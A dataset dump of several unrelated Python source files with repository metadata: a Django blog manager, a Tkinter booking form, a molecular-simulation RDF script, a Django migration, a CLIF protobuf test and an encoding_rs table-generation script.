entries__status=PUBLISHED,
entries__start_publication__lte=now,
entries__end_publication__gt=now,
entries__sites=Site.objects.get_current()
).distinct()
def entries_published(queryset):
"""Return only the entries published"""
now = datetime.now()
return queryset.filter(status=PUBLISHED,
start_publication__lte=now,
end_publication__gt=now,
sites=Site.objects.get_current())
class EntryPublishedManager(models.Manager):
"""Manager to retrieve published entries"""
def get_query_set(self):
"""Return published entries"""
return entries_published(
super(EntryPublishedManager, self).get_query_set())
def on_site(self):
"""Return entries published on current site"""
return super(EntryPublishedManager, self).get_query_set(
).filter(sites=Site.objects.get_current())
def search(self, pattern):
"""Top level search method on entries"""
try:
return self.advanced_search(pattern)
except:
return self.basic_search(pattern)
def advanced_search(self, pattern):
"""Advanced search on entries"""
from lincdm.blog.search import advanced_search
return advanced_search(pattern)
def basic_search(self, pattern):
"""Basic search on entries"""
lookup = None
for pattern in pattern.split():
query_part = models.Q(content__icontains=pattern) | \
models.Q(excerpt__icontains=pattern) | \
models.Q(title__icontains=pattern)
if lookup is None:
lookup = query_part
else:
lookup |= query_part
return self.get_query_set().filter(lookup)
| [
"[email protected]"
] | |
523050cba42f58cd7ac14e6992ad3f7708a17e55 | ba2ad1187e447dc948e32ff1629935d2f05b7d59 | /New folder/08 Accepting User Input In Tkinter Form.py | 2bdfa914adfd1ad27b6475cf0c318faf44ff9aea | [] | no_license | kkgarai/Tkinter | 14fce2e0bbbe013a439f0f7fff8a3e88d3a5370e | 4ce77c22b1229484cdae5f8926011ca32fe0d9ba | refs/heads/master | 2023-02-27T11:10:51.678239 | 2021-02-02T21:08:38 | 2021-02-02T21:08:38 | 295,819,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,989 | py | from tkinter import *
root = Tk()
def getvals():
print("Submitting form")
print(
f"{namevalue.get(), phonevalue.get(), gendervalue.get(), emergencyvalue.get(), paymentmodevalue.get(), foodservicevalue.get()} ")
with open("records.txt", "a") as f:
f.write(
f"{namevalue.get(), phonevalue.get(), gendervalue.get(), emergencyvalue.get(), paymentmodevalue.get(), foodservicevalue.get()}\n")
root.geometry("644x344")
# Heading
Label(root, text="Welcome to Harry Travels", font="comicsansms 13 bold",
pady=15).grid(row=0, column=3)
# Text for our form
name = Label(root, text="Name")
phone = Label(root, text="Phone")
gender = Label(root, text="Gender")
emergency = Label(root, text="Emergency Contact")
paymentmode = Label(root, text="Payment Mode")
# Pack text for our form
name.grid(row=1, column=2)
phone.grid(row=2, column=2)
gender.grid(row=3, column=2)
emergency.grid(row=4, column=2)
paymentmode.grid(row=5, column=2)
# Tkinter variable for storing entries
namevalue = StringVar()
phonevalue = StringVar()
gendervalue = StringVar()
emergencyvalue = StringVar()
paymentmodevalue = StringVar()
foodservicevalue = IntVar()
# Entries for our form
nameentry = Entry(root, textvariable=namevalue)
phoneentry = Entry(root, textvariable=phonevalue)
genderentry = Entry(root, textvariable=gendervalue)
emergencyentry = Entry(root, textvariable=emergencyvalue)
paymentmodeentry = Entry(root, textvariable=paymentmodevalue)
# Packing the Entries
nameentry.grid(row=1, column=3)
phoneentry.grid(row=2, column=3)
genderentry.grid(row=3, column=3)
emergencyentry.grid(row=4, column=3)
paymentmodeentry.grid(row=5, column=3)
# Checkbox & Packing it
foodservice = Checkbutton(text="Want to prebook your meals?",
variable=foodservicevalue)
foodservice.grid(row=6, column=3)
# Button & packing it and assigning it a command
Button(text="Submit to Harry Travels", command=getvals).grid(row=7, column=3)
root.mainloop()
| [
"[email protected]"
] | |
582c4ad65e1b6f2bff267c7119594dd2d2af4f26 | 30d360f965253167c99f9b4cd41001491aed08af | /PTFE_code/Old/rdf_ptfe.py | 12cde9224cf10d6a131600e280ca7a988aaaa356 | [] | no_license | petervanya/PhDcode | d2d9f7170f201d6175fec9c3d4094617a5427fb5 | 891e6812a2699025d26b901c95d0c46a706b0c96 | refs/heads/master | 2020-05-22T06:43:47.293134 | 2018-01-29T12:59:42 | 2018-01-29T12:59:42 | 64,495,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,431 | py | #!/usr/bin/env python
"""Usage:
rdf_ptfe.py (--bead <b> | water) <fnames>
[--L <L> --bins <nbins> --binalg <b>]
Read xyz files and compute radial distribution function
for any DPD beads or water beads (water is in both beads C and W):
* C: 3 molecules (SO3+3H2O, bead 3)
* W: 6 molecules (bead 4)
Arguments:
--beadtype <b> Number from 1 to num. bead types, typically 4
<fnames> Regex for all the xyz files to read
Options:
--bins <nbins> Number of bins
--binalg <b> 'numpy' or 'fortran' [Default: fortran]
--L <L> Box size [default: 40.0]
[email protected], 09/01/16
"""
import numpy as np
from math import *
import glob, sys
from docopt import docopt
import lmp_lib as ll
from Fcore.f_rdf import f_rdf # Fortran module
def set_num_bins(N, method="sqrt"):
"""Set number of histogram bins, various recipes.
Available methods: rice, sturges, sqrt (default)"""
if method == "rice":
return int(2*N**(1./3)) + 1 # Rice rule
elif method == "sturges":
return int(log(N, 2)+1) + 1 # Sturges' formula
else:
return int(sqrt(N)) + 1 # most primitive
def read_outfile(outfile):
"""Read one xyz outfile into a numpy matrix"""
A = open(outfile, "r").readlines()[2:]
A = [line.split() for line in A]
A = np.array(A, order="F").astype(float)
return A
def save_data(outfile, *args):
"""Save two vectors into file"""
m, n = len(args), len(args[0]) # cols, rows
args = zip(*args)
with open(outfile, "w") as f:
for i in range(n):
line = ""
for j in range(m):
line += str(args[i][j]) + "\t"
line += "\n"
f.write(line)
def compute_rdf_water_np(outfile, L, nbins=30):
"""Compute radial dist'n fcn from the xyz frame using
Fortran routine for pair distances and numpy binning
"""
A = read_outfile(outfile)
xyz_C = A[A[:, 0] == 3][:, 1:]
xyz_W = A[A[:, 0] == 4][:, 1:]
cell = L * np.eye((3, 3))
d_C = f_rdf.dist_vec(xyz_C, cell) # rdf for beads C
# print " Distance matrix for C beads done."
rdf_raw_C, r = np.histogram(d_C, nbins)
# print " Binning for C beads done."
del d_C
d_W = f_rdf.dist_vec(xyz_W, cell) # rdf for beads W
# print " Distance matrix for W beads done."
rdf_raw_W, r = np.histogram(d_W, nbins)
# print " Binning for W beads done."
del d_W
d_CW = f_rdf.dist_vec_2mat(xyz_C, xyz_W, cell) # rdf for combined beads C and W
# print " Distance matrix for CW beads done."
rdf_raw_CW, r = np.histogram(d_CW, nbins)
# print " Binning for CW beads done."
del d_CW
rdf_raw = rdf_raw_C * 3**2 + rdf_raw_W * 6**2 + rdf_raw_CW * 3*6
r = r[:-1] + np.diff(r)/2.0
dr = r[1] - r[0]
rdf = rdf_raw/(4*pi*r**2 * dr)
return r, rdf
def compute_rdf_water(outfile, L, nbins=30):
"""Compute radial dist'n fcn from the xyz frame
using Fortran routine, both distance matrix and binning"""
A = read_outfile(outfile)
xyz_C = A[A[:, 0] == 3][:, 1:]
xyz_W = A[A[:, 0] == 4][:, 1:]
cell = L * np.eye((3, 3))
rdf_raw_C, r = f_rdf.pair_dist_hist(xyz_C, nbins, cell)
# print " Bead C pair dist and binning beads done"
rdf_raw_W, r = f_rdf.pair_dist_hist(xyz_W, nbins, cell)
# print " Bead W pair dist and binning beads done"
rdf_raw_CW, r = f_rdf.pair_dist_hist2(xyz_C, xyz_W, nbins, cell)
# print " Beads C and W pair dist and binning beads done"
rdf_raw = rdf_raw_C * 3**2 + rdf_raw_W * 6**2 + rdf_raw_CW * 3*6
r = r[:-1] + np.diff(r)/2.0
dr = r[1] - r[0]
rdf = rdf_raw/(4*pi*r**2 * dr)
return r, rdf
def master_rdf_water(outfiles, L, nbins=30, method="fortran"):
"""Construct an rdf for water beads
from all the available xyz files"""
rdf_mat = []
if method == "fortran":
for outfile in outfiles:
r, rdf_i = compute_rdf_water(outfile, L, nbins)
rdf_mat.append(rdf_i)
print(outfile, "done.")
if method == "numpy":
for outfile in outfiles:
r, rdf_i = compute_rdf_water_np(outfile, L, nbins)
rdf_mat.append(rdf_i)
print(outfile, "done.")
rdf_mat = np.array(rdf_mat).T
np.savetxt("rdf_mat.out", rdf_mat)
print("rdf matrix saved in rdf_mat.out")
rdf = np.array(np.sum(rdf_mat, 1) / len(outfiles))
return r, rdf
def compute_rdf(outfile, L, beadtype, nbins=30):
"""Compute RDF from the xyz frame uusing Fortran routine, distance matrix and binning"""
A = read_outfile(outfile)
cell = L * np.eye((3, 3))
xyz = A[A[:, 0] == beadtype][:, 1:]
rdf_raw, r = f_rdf.pair_dist_hist(xyz, nbins, cell) # key routine
r = r[:-1] + np.diff(r)/2.0
dr = r[1] - r[0]
rdf = rdf_raw/(4*pi*r**2 * dr)
return r, rdf
def master_rdf(outfiles, L, beadtype, nbins=30):
"""Construct an rdf for given bead type
from all the available xyz files"""
rdf_mat = []
for outfile in outfiles:
r, rdf_i = compute_rdf(outfile, L, beadtype, nbins)
rdf_mat.append(rdf_i)
print(outfile, "done.")
rdf_mat = np.array(rdf_mat).T
np.savetxt("rdf_mat.out", rdf_mat)
print("rdf matrix saved in rdf_mat.out")
rdf = np.array(np.sum(rdf_mat, 1) / len(outfiles))
return r, rdf
if __name__ == "__main__":
args = docopt(__doc__)
outfiles = glob.glob(args["<fnames>"])
beadtype = "water" if args["water"] else args["<b>"]
if len(outfiles) == 0:
raise ValueError("No xyz files captured, aborting.")
print(outfiles)
Nfiles = len(outfiles)
N = int(open(outfiles[0], "r").readline())
L = float(args["--L"])
if args["--bins"]:
Nbins = int(args["--bins"])
else:
Nbins = set_num_bins(N, method="sturges")
method = args["--binalg"]
A = ll.read_xyzfile(outfiles[0])
Nbt = len(set(A[:, 0]))
Nb = len(A[A[:, 0] == int(beadtype)])
print("Total beads: %i | Num. beadtypes: %i | Bins: %i" % (N, Nbt, Nbins))
print("Bead type: %s | Beads of this type: %i" % (beadtype, Nb))
if beadtype == "water":
r, vals = master_rdf_water(outfiles, L, Nbins, method)
fname = "rdf_water.out"
else:
r, vals = master_rdf(outfiles, L, int(beadtype), Nbins)
fname = "rdf.out"
save_data(fname, r, vals)
print("rdf saved in", fname)
| [
"[email protected]"
] | |
c66bd3c2ab4b0774d6d5247124b5b57b6b452835 | b2716c78a38fcc0acee852c3e33bf110fa35f4f6 | /Rem_pro/yes_no_app/migrations/0001_initial.py | adac69f943774781d801b67b55ffe04899f1a85d | [] | no_license | RajeshKumar-1998/Reminder-App | f381e8728af5694d5e0e627ed261886a20b45318 | 985a1ee548b8a5b1a9970a9421cac4c98d6fc3b4 | refs/heads/master | 2022-11-07T00:27:30.348065 | 2020-06-19T11:28:35 | 2020-06-19T11:28:35 | 259,647,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | # Generated by Django 2.2.7 on 2019-12-03 23:54
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Todorem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('list', models.CharField(max_length=200)),
('completes', models.BooleanField(default=False)),
],
),
]
| [
"[email protected]"
] | |
bae8017147a594e2103ce78cf22b3560ebbb921d | 68c37d6a87113fb992126e9806a78896d1727c43 | /examples/wrap_protos/python/wrap_protos_test.py | dd8e3e8c73c9fec00c9ebd62bbdad2337b427a09 | [
"Apache-2.0"
] | permissive | Pandinosaurus/clif | 1b8be31a0b1b45b11d93fe2d7b3f359f69d9075f | 87eed3999dba9f8d160c6b735e1803640d019289 | refs/heads/master | 2021-04-09T13:53:23.744431 | 2020-09-11T01:53:03 | 2020-09-11T01:53:03 | 125,673,546 | 1 | 0 | Apache-2.0 | 2020-09-11T04:35:26 | 2018-03-17T22:20:42 | C++ | UTF-8 | Python | false | false | 2,310 | py | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clif.examples.wrap_protos.python.wrap_protos."""
import unittest
import wrap_protos
import sample_pb2
class WrapProtosTest(unittest.TestCase):
def testProtos(self):
s = sample_pb2.MyMessage()
# Even though DefaultInitSample on the C++ side takes a pointer to the
# proto, |s| is serialized and deserialized in to a copy of the C++ proto.
# Hence, changes made to the proto on the C++ side do not reflect in Python.
wrap_protos.DefaultInitMyMessage(s)
self.assertNotEqual(s.name, 'default')
# |s| is a normal Python proto with all its normal Python proto API.
s.name = 'my_python_name'
s.msg.id.append(123)
s.msg.id.append(345)
self.assertEqual(len(s.msg.id), 2)
pman = wrap_protos.ProtoManager()
# The GetSample method returns a copy of the proto even though the C++
# method returns a pointer. The C++ proto is serialized and then
# deserialized into a Python proto.
s = pman.GetMyMessage()
self.assertEqual(s.name, 'default')
# Changing the proto in Python does not have any effect on the C++ side.
s.name = 'new_name'
s = pman.GetMyMessage()
self.assertEqual(s.name, 'default')
# Create instances of nested proto messages using the '.' notation as usual.
nested = sample_pb2.MyMessage.Nested()
nested.value = sample_pb2.MyMessage.Nested.DEFAULT
# And pass them to a wrapped functions as usual.
msg = wrap_protos.MakeMyMessageFromNested(nested)
self.assertEquals(msg.name, 'from_nested')
enum_val = sample_pb2.MyMessage.Nested.EXPLICIT
msg = wrap_protos.MakeMyMessageFromNestedEnum(enum_val)
self.assertEquals(msg.name, 'from_nested_enum')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b944c87d448e9067ff47da684933ca3c2636ec8c | 297497957c531d81ba286bc91253fbbb78b4d8be | /third_party/rust/encoding_rs/generate-encoding-data.py | 4dfb5adc686b716ece27c03e8d980a78de605f17 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 57,123 | py |
import json
import subprocess
import sys
import os.path
if (not os.path.isfile("../encoding/encodings.json")) or (not os.path.isfile("../encoding/indexes.json")):
sys.stderr.write("This script needs a clone of https://github.com/whatwg/encoding/ (preferably at revision f381389) next to the encoding_rs directory.\n");
sys.exit(-1)
if not os.path.isfile("../encoding_c/src/lib.rs"):
sys.stderr.write("This script also writes the generated parts of the encoding_c crate and needs a clone of https://github.com/hsivonen/encoding_c next to the encoding_rs directory.\n");
sys.exit(-1)
if not os.path.isfile("../codepage/src/lib.rs"):
sys.stderr.write("This script also writes the generated parts of the codepage crate and needs a clone of https://github.com/hsivonen/codepage next to the encoding_rs directory.\n");
sys.exit(-1)
def cmp_from_end(one, other):
c = cmp(len(one), len(other))
if c != 0:
return c
i = len(one) - 1
while i >= 0:
c = cmp(one[i], other[i])
if c != 0:
return c
i -= 1
return 0
class Label:
def __init__(self, label, preferred):
self.label = label
self.preferred = preferred
def __cmp__(self, other):
return cmp_from_end(self.label, other.label)
class CodePage:
def __init__(self, code_page, preferred):
self.code_page = code_page
self.preferred = preferred
def __cmp__(self, other):
return self.code_page, other.code_page
def static_u16_table(name, data):
data_file.write('''pub static %s: [u16; %d] = [
''' % (name, len(data)))
for i in xrange(len(data)):
data_file.write('0x%04X,\n' % data[i])
data_file.write('''];
''')
def static_u16_table_from_indexable(name, data, item, feature):
data_file.write('''#[cfg(all(
feature = "less-slow-%s",
not(feature = "fast-%s")
))]
static %s: [u16; %d] = [
''' % (feature, feature, name, len(data)))
for i in xrange(len(data)):
data_file.write('0x%04X,\n' % data[i][item])
data_file.write('''];
''')
def static_u8_pair_table_from_indexable(name, data, item, feature):
data_file.write('''#[cfg(all(
feature = "less-slow-%s",
not(feature = "fast-%s")
))]
static %s: [[u8; 2]; %d] = [
''' % (feature, feature, name, len(data)))
for i in xrange(len(data)):
data_file.write('[0x%02X, 0x%02X],\n' % data[i][item])
data_file.write('''];
''')
def static_u8_pair_table(name, data, feature):
data_file.write('''#[cfg(feature = "%s")]
static %s: [[u8; 2]; %d] = [
''' % (feature, name, len(data)))
for i in xrange(len(data)):
pair = data[i]
if not pair:
pair = (0, 0)
data_file.write('[0x%02X, 0x%02X],\n' % pair)
data_file.write('''];
''')
preferred = []
dom = []
labels = []
data = json.load(open("../encoding/encodings.json", "r"))
indexes = json.load(open("../encoding/indexes.json", "r"))
single_byte = []
multi_byte = []
def to_camel_name(name):
if name == u"iso-8859-8-i":
return u"Iso8I"
if name.startswith(u"iso-8859-"):
return name.replace(u"iso-8859-", u"Iso")
return name.title().replace(u"X-", u"").replace(u"-", u"").replace(u"_", u"")
def to_constant_name(name):
return name.replace(u"-", u"_").upper()
def to_snake_name(name):
return name.replace(u"-", u"_").lower()
def to_dom_name(name):
return name
encodings_by_code_page_frequency = [
"UTF-8",
"UTF-16LE",
"windows-1252",
"windows-1251",
"GBK",
"Shift_JIS",
"EUC-KR",
"windows-1250",
"windows-1256",
"windows-1254",
"Big5",
"windows-874",
"windows-1255",
"windows-1253",
"windows-1257",
"windows-1258",
"EUC-JP",
"ISO-8859-2",
"ISO-8859-15",
"ISO-8859-7",
"KOI8-R",
"gb18030",
"ISO-8859-5",
"ISO-8859-8-I",
"ISO-8859-4",
"ISO-8859-6",
"ISO-2022-JP",
"KOI8-U",
"ISO-8859-13",
"ISO-8859-3",
"UTF-16BE",
"IBM866",
"ISO-8859-10",
"ISO-8859-8",
"macintosh",
"x-mac-cyrillic",
"ISO-8859-14",
"ISO-8859-16",
]
encodings_by_code_page = {
932: "Shift_JIS",
936: "GBK",
949: "EUC-KR",
950: "Big5",
866: "IBM866",
874: "windows-874",
1200: "UTF-16LE",
1201: "UTF-16BE",
1250: "windows-1250",
1251: "windows-1251",
1252: "windows-1252",
1253: "windows-1253",
1254: "windows-1254",
1255: "windows-1255",
1256: "windows-1256",
1257: "windows-1257",
1258: "windows-1258",
10000: "macintosh",
10017: "x-mac-cyrillic",
20866: "KOI8-R",
20932: "EUC-JP",
21866: "KOI8-U",
28592: "ISO-8859-2",
28593: "ISO-8859-3",
28594: "ISO-8859-4",
28595: "ISO-8859-5",
28596: "ISO-8859-6",
28597: "ISO-8859-7",
28598: "ISO-8859-8",
28600: "ISO-8859-10",
28603: "ISO-8859-13",
28604: "ISO-8859-14",
28605: "ISO-8859-15",
28606: "ISO-8859-16",
38598: "ISO-8859-8-I",
50221: "ISO-2022-JP",
54936: "gb18030",
65001: "UTF-8",
}
code_pages_by_encoding = {}
for code_page, encoding in encodings_by_code_page.iteritems():
code_pages_by_encoding[encoding] = code_page
encoding_by_alias_code_page = {
951: "Big5",
10007: "x-mac-cyrillic",
20936: "GBK",
20949: "EUC-KR",
21010: "UTF-16LE",
28591: "windows-1252",
28599: "windows-1254",
28601: "windows-874",
50220: "ISO-2022-JP",
50222: "ISO-2022-JP",
50225: "replacement",
50227: "replacement",
51949: "EUC-JP",
51936: "GBK",
51949: "EUC-KR",
52936: "replacement",
}
code_pages = []
for name in encodings_by_code_page_frequency:
code_pages.append(code_pages_by_encoding[name])
encodings_by_code_page.update(encoding_by_alias_code_page)
temp_keys = encodings_by_code_page.keys()
temp_keys.sort()
for code_page in temp_keys:
if not code_page in code_pages:
code_pages.append(code_page)
start_of_longest_run_in_single_byte = {
"IBM866": 96,
"windows-874": 33,
"windows-1250": 92,
"windows-1251": 64,
"windows-1252": 32,
"windows-1253": 83,
"windows-1254": 95,
"windows-1255": 96,
"windows-1256": 65,
"windows-1257": 95,
"windows-1258": 95,
"macintosh": 106,
"x-mac-cyrillic": 96,
"KOI8-R": 64,
"KOI8-U": 64,
"ISO-8859-2": 95,
"ISO-8859-3": 95,
"ISO-8859-4": 95,
"ISO-8859-5": 46,
"ISO-8859-6": 65,
"ISO-8859-7": 83,
"ISO-8859-8": 96,
"ISO-8859-10": 90,
"ISO-8859-13": 95,
"ISO-8859-14": 95,
"ISO-8859-15": 63,
"ISO-8859-16": 95,
}
for group in data:
if group["heading"] == "Legacy single-byte encodings":
single_byte = group["encodings"]
else:
multi_byte.extend(group["encodings"])
for encoding in group["encodings"]:
preferred.append(encoding["name"])
for label in encoding["labels"]:
labels.append(Label(label, encoding["name"]))
for name in preferred:
dom.append(to_dom_name(name))
preferred.sort()
labels.sort()
dom.sort(cmp=cmp_from_end)
longest_label_length = 0
longest_name_length = 0
longest_label = None
longest_name = None
for name in preferred:
if len(name) > longest_name_length:
longest_name_length = len(name)
longest_name = name
for label in labels:
if len(label.label) > longest_label_length:
longest_label_length = len(label.label)
longest_label = label.label
def longest_run_for_single_byte(name):
if name == u"ISO-8859-8-I":
name = u"ISO-8859-8"
index = indexes[name.lower()]
run_byte_offset = start_of_longest_run_in_single_byte[name]
run_bmp_offset = index[run_byte_offset]
previous_code_point = run_bmp_offset
run_length = 1
while True:
i = run_byte_offset + run_length
if i == len(index):
break
code_point = index[i]
if previous_code_point + 1 != code_point:
break
previous_code_point = code_point
run_length += 1
return (run_bmp_offset, run_byte_offset, run_length)
def is_single_byte(name):
for encoding in single_byte:
if name == encoding["name"]:
return True
return False
def read_non_generated(path):
partially_generated_file = open(path, "r")
full = partially_generated_file.read()
partially_generated_file.close()
generated_begin = "// BEGIN GENERATED CODE. PLEASE DO NOT EDIT."
generated_end = "// END GENERATED CODE"
generated_begin_index = full.find(generated_begin)
if generated_begin_index < 0:
sys.stderr.write("Can't find generated code start marker in %s. Exiting.\n" % path)
sys.exit(-1)
generated_end_index = full.find(generated_end)
if generated_end_index < 0:
sys.stderr.write("Can't find generated code end marker in %s. Exiting.\n" % path)
sys.exit(-1)
return (full[0:generated_begin_index + len(generated_begin)],
full[generated_end_index:])
(lib_rs_begin, lib_rs_end) = read_non_generated("src/lib.rs")
label_file = open("src/lib.rs", "w")
label_file.write(lib_rs_begin)
label_file.write("""
// Instead, please regenerate using generate-encoding-data.py
const LONGEST_LABEL_LENGTH: usize = %d; // %s
""" % (longest_label_length, longest_label))
for name in preferred:
variant = None
if is_single_byte(name):
(run_bmp_offset, run_byte_offset, run_length) = longest_run_for_single_byte(name)
variant = "SingleByte(&data::SINGLE_BYTE_DATA.%s, 0x%04X, %d, %d)" % (to_snake_name(u"iso-8859-8" if name == u"ISO-8859-8-I" else name), run_bmp_offset, run_byte_offset, run_length)
else:
variant = to_camel_name(name)
docfile = open("doc/%s.txt" % name, "r")
doctext = docfile.read()
docfile.close()
label_file.write('''/// The initializer for the [%s](static.%s.html) encoding.
///
/// For use only for taking the address of this form when
/// Rust prohibits the use of the non-`_INIT` form directly,
/// such as in initializers of other `static`s. If in doubt,
/// use the corresponding non-`_INIT` reference-typed `static`.
///
/// This part of the public API will go away if Rust changes
/// to make the referent of `pub const FOO: &'static Encoding`
/// unique cross-crate or if Rust starts allowing static arrays
/// to be initialized with `pub static FOO: &'static Encoding`
/// items.
pub static %s_INIT: Encoding = Encoding {
name: "%s",
variant: VariantEncoding::%s,
};
/// The %s encoding.
///
%s///
/// This will change from `static` to `const` if Rust changes
/// to make the referent of `pub const FOO: &'static Encoding`
/// unique cross-crate, so don't take the address of this
/// `static`.
pub static %s: &'static Encoding = &%s_INIT;
''' % (to_dom_name(name), to_constant_name(name), to_constant_name(name), to_dom_name(name), variant, to_dom_name(name), doctext, to_constant_name(name), to_constant_name(name)))
label_file.write("""static LABELS_SORTED: [&'static str; %d] = [
""" % len(labels))
for label in labels:
label_file.write('''"%s",\n''' % label.label)
label_file.write("""];
static ENCODINGS_IN_LABEL_SORT: [&'static Encoding; %d] = [
""" % len(labels))
for label in labels:
label_file.write('''&%s_INIT,\n''' % to_constant_name(label.preferred))
label_file.write('''];
''')
label_file.write(lib_rs_end)
label_file.close()
label_test_file = open("src/test_labels_names.rs", "w")
label_test_file.write('''// Any copyright to the test code below this comment is dedicated to the
// Public Domain. http://creativecommons.org/publicdomain/zero/1.0/
// THIS IS A GENERATED FILE. PLEASE DO NOT EDIT.
// Instead, please regenerate using generate-encoding-data.py
use super::*;
#[test]
fn test_all_labels() {
''')
for label in labels:
label_test_file.write('''assert_eq!(Encoding::for_label(b"%s"), Some(%s));\n''' % (label.label, to_constant_name(label.preferred)))
label_test_file.write('''}
''')
label_test_file.close()
def null_to_zero(code_point):
if not code_point:
code_point = 0
return code_point
(data_rs_begin, data_rs_end) = read_non_generated("src/data.rs")
data_file = open("src/data.rs", "w")
data_file.write(data_rs_begin)
data_file.write('''
// Instead, please regenerate using generate-encoding-data.py
#[repr(align(64))] // Align to cache lines
pub struct SingleByteData {
''')
for encoding in single_byte:
name = encoding["name"]
if name == u"ISO-8859-8-I":
continue
data_file.write(''' pub %s: [u16; 128],
''' % to_snake_name(name))
data_file.write('''}
pub static SINGLE_BYTE_DATA: SingleByteData = SingleByteData {
''')
for encoding in single_byte:
name = encoding["name"]
if name == u"ISO-8859-8-I":
continue
data_file.write(''' %s: [
''' % to_snake_name(name))
for code_point in indexes[name.lower()]:
data_file.write('0x%04X,\n' % null_to_zero(code_point))
data_file.write('''],
''')
data_file.write('''};
''')
index = indexes["big5"]
astralness = []
low_bits = []
for code_point in index[942:19782]:
if code_point:
astralness.append(1 if code_point > 0xFFFF else 0)
low_bits.append(code_point & 0xFFFF)
else:
astralness.append(0)
low_bits.append(0)
for j in xrange(32 - (len(astralness) % 32)):
astralness.append(0)
data_file.write('''#[cfg_attr(feature = "cargo-clippy", allow(unreadable_literal))]
static BIG5_ASTRALNESS: [u32; %d] = [
''' % (len(astralness) / 32))
i = 0
while i < len(astralness):
accu = 0
for j in xrange(32):
accu |= astralness[i + j] << j
data_file.write('0x%08X,\n' % accu)
i += 32
data_file.write('''];
''')
static_u16_table("BIG5_LOW_BITS", low_bits)
level1_hanzi_index = index[5495:10896]
level1_hanzi_pairs = []
for i in xrange(len(level1_hanzi_index)):
hanzi_lead = (i / 157) + 0xA4
hanzi_trail = (i % 157)
hanzi_trail += 0x40 if hanzi_trail < 0x3F else 0x62
level1_hanzi_pairs.append((level1_hanzi_index[i], (hanzi_lead, hanzi_trail)))
level1_hanzi_pairs.append((0x4E5A, (0xC8, 0x7B)))
level1_hanzi_pairs.append((0x5202, (0xC8, 0x7D)))
level1_hanzi_pairs.append((0x9FB0, (0xC8, 0xA1)))
level1_hanzi_pairs.append((0x5188, (0xC8, 0xA2)))
level1_hanzi_pairs.append((0x9FB1, (0xC8, 0xA3)))
level1_hanzi_pairs.sort(key=lambda x: x[0])
static_u16_table_from_indexable("BIG5_LEVEL1_HANZI_CODE_POINTS", level1_hanzi_pairs, 0, "big5-hanzi-encode")
static_u8_pair_table_from_indexable("BIG5_LEVEL1_HANZI_BYTES", level1_hanzi_pairs, 1, "big5-hanzi-encode")
big5_unified_ideograph_bytes = [None] * (0x9FCC - 0x4E00)
for row in xrange(0x7E - 0x20):
for column in xrange(157):
pointer = 5024 + column + (row * 157)
code_point = index[pointer]
if code_point and code_point >= 0x4E00 and code_point <= 0x9FCB:
unified_offset = code_point - 0x4E00
unified_lead = 0xA1 + row
unified_trail = (0x40 if column < 0x3F else 0x62) + column
if code_point == 0x5341 or code_point == 0x5345 or not big5_unified_ideograph_bytes[unified_offset]:
big5_unified_ideograph_bytes[unified_offset] = (unified_lead, unified_trail)
static_u8_pair_table("BIG5_UNIFIED_IDEOGRAPH_BYTES", big5_unified_ideograph_bytes, "fast-big5-hanzi-encode")
index = indexes["jis0208"]
static_u16_table("JIS0208_LEVEL1_KANJI", index[1410:4375])
static_u16_table("JIS0208_LEVEL2_AND_ADDITIONAL_KANJI", index[4418:7808])
static_u16_table("IBM_KANJI", index[8272:8632])
if index[8272:8632] != index[10744:11104]:
raise Error()
symbol_index = []
symbol_triples = []
pointers_to_scan = [
(0, 188),
(658, 691),
(1159, 1221),
]
in_run = False
run_start_pointer = 0
run_start_array_index = 0
for (start, end) in pointers_to_scan:
for i in range(start, end):
code_point = index[i]
if in_run:
if code_point:
symbol_index.append(code_point)
else:
symbol_triples.append(run_start_pointer)
symbol_triples.append(i - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
else:
if code_point:
in_run = True
run_start_pointer = i
run_start_array_index = len(symbol_index)
symbol_index.append(code_point)
if in_run:
symbol_triples.append(run_start_pointer)
symbol_triples.append(end - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
if in_run:
raise Error()
run_start_array_index = len(symbol_index)
symbol_index.extend(index[10736:10744])
symbol_triples.append(10736)
symbol_triples.append(8)
symbol_triples.append(run_start_array_index)
symbol_triples.append(8644)
symbol_triples.append(4)
symbol_triples.append(run_start_array_index)
static_u16_table("JIS0208_SYMBOLS", symbol_index)
static_u16_table("JIS0208_SYMBOL_TRIPLES", symbol_triples)
data_file.write('''const IBM_SYMBOL_START: usize = %d;''' % (run_start_array_index + 1))
data_file.write('''const IBM_SYMBOL_END: usize = %d;''' % (run_start_array_index + 4))
data_file.write('''const IBM_SYMBOL_POINTER_START: usize = %d;''' % 8645)
range_triples = []
pointers_to_scan = [
(188, 281),
(470, 657),
(1128, 1159),
(8634, 8644),
(10716, 10736),
]
in_run = False
run_start_pointer = 0
run_start_code_point = 0
previous_code_point = 0
for (start, end) in pointers_to_scan:
for i in range(start, end):
code_point = index[i]
if in_run:
if code_point:
if previous_code_point + 1 != code_point:
range_triples.append(run_start_pointer)
range_triples.append(i - run_start_pointer)
range_triples.append(run_start_code_point)
run_start_pointer = i
run_start_code_point = code_point
previous_code_point = code_point
else:
range_triples.append(run_start_pointer)
range_triples.append(i - run_start_pointer)
